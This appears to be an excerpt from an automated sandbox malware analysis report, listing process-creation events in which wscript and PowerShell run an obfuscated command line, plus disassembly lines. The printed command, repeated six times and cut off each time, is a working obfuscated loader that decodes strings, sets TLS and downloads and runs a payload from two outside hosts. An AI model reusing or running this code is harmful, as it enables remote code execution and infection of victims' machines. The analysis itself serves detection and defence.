              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (BrandmyndigheJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,19_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF886FB3025 pushad ; ret 2_2_00007FF886FB313A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0481EC78 pushfd ; retf 5_2_0481EC79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07681FB2 push eax; mov dword ptr [esp], ecx5_2_076821B4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F648A4 push ebx; ret 5_2_08F648A5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F62845 push cs; iretd 5_2_08F6284F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F64D9F push ss; ret 5_2_08F64DAC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F63571 push esp; ret 5_2_08F6358B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08F63118 push eax; iretd 5_2_08F6311A
